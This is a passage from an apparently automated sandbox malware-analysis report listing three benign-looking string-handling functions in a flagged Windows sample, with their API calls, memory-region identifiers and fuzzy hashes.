                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 1100898210-3355392842
                                                                                                                        • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                                                        • Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
                                                                                                                        • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                                                        • Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8
                                                                                                                        Function 00405E3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,80000000,00000003), ref: 00405E42
                                                                                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,80000000,00000003), ref: 00405E52
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrlen
                                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                                        • API String ID: 2709904686-3370423016
                                                                                                                        • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                        • Instruction ID: eba18341e72c17137544591cfc51a7e4cac6184970473274e9d14fc4341c5a90
                                                                                                                        • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                        • Instruction Fuzzy Hash: 29D0A7F3400A30DAC3127708EC00D9F77ACEF16700746443AE580A7165D7785D818AEC
                                                                                                                        Function 00405F76 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
                                                                                                                        • CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190613189-0
                                                                                                                        • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                        • Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
                                                                                                                        • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                        • Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8